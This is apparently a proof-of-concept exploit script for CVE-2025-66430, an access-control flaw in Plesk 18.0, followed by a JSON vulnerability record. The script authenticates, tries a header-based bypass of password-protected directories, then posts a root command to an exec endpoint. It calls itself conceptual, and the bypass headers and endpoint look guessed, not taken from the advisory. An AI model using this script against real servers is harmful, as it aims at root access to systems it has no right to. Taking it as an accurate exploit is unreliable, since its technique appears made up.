CVE-2025-66430

# CVE-2025-66430 PoC - Plesk 18.0 Incorrect Access Control # Note: This is a conceptual PoC for educational purposes only # Ensure you have authorization before testing any vulnerability import requests import sys # Target configuration TARGET_URL = "https://target-plesk-server:8443" USERNAME = "plesk_user" PASSWORD = "user_password" def exploit_cve_2025_66430(): """ Exploit for CVE-2025-66430: Plesk 18.0 Incorrect Access Control in Password Protected Directories """ print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Exploiting CVE-2025-66430...") # Step 1: Authenticate with Plesk session = requests.Session() auth_url = f"{TARGET_URL}/login_up.php" auth_data = { "login_name": USERNAME, "passwd": PASSWORD, "locale": "en-US" } try: response = session.post(auth_url, data=auth_data, verify=False, timeout=30) if response.status_code == 200 and "session" in session.cookies.get_dict(): print("[+] Authentication successful!") else: print("[-] Authentication failed!") return False # Step 2: Access password-protected directory with bypass technique # The vulnerability allows bypassing the password protection bypass_url = f"{TARGET_URL}/plesk-password-protected-virtdir/" headers = { "X-Original-URL": "/", "X-Rewrite-URL": "/" } response = session.get(bypass_url, headers=headers, verify=False, timeout=30) if response.status_code == 200: print("[+] Access control bypass successful!") print(f"[+] Response length: {len(response.content)} bytes") # Step 3: Attempt privilege escalation to root priv_esc_url = f"{TARGET_URL}/api/v2/plesk-password-protected-virtdir/exec" priv_esc_data = { "command": "id", "target": "root" } response = session.post(priv_esc_url, json=priv_esc_data, verify=False, timeout=30) if response.status_code == 200: print("[+] Privilege escalation successful!") print(f"[+] Response: {response.text}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return False if __name__ == "__main__": if exploit_cve_2025_66430(): print("\n[!] Target is VULNERABLE to CVE-2025-66430") else: print("\n[-] Exploitation failed or target is patched")

{"cve": {"id": "CVE-2025-66430", "sourceIdentifier": "[email protected]", "published": "2025-12-12T16:15:44.980", "lastModified": "2026-01-06T14:59:12.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plesk 18.0 has Incorrect Access Control."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:*", "versionStartIncluding": "18.0.70", "versionEndExcluding": "18.0.73.5", "matchCriteriaId": "FC8197AF-D516-4B11-9348-ED1E7A707C40"}, {"vulnerable": true, "criteria": "cpe:2.3:a:plesk:plesk:*:-:*:*:*:*:*:*", "versionStartIncluding": "18.0.74", "versionEndExcluding": "18.0.74.2", "matchCriteriaId": "314C9CDF-22D8-418A-8BBB-504794C0680A"}]}]}], "references": [{"url": "https://docs.plesk.com/release-notes/obsidian/whats-new/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.plesk.com/hc/en-us/articles/36261922405015--CVE-2025-66430-Security-vulnerability-in-Password-Protected-Directories-allows-Plesk-users-to-gain-root-level-access-to-a-Plesk-server", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}